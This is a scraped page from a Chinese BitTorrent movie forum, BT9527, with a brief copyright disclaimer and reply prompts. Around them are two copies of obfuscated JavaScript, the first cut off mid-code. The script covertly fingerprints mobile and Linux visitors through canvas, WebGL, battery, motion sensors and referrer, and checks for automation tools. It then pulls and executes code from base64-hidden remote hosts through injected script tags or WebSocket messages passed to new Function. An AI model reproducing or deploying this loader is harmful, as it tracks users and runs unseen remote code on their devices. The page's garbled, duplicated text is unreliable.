s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};
上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (12)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x45\x77\x59\x6e\x77\x4c\x44\x4f\x62\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};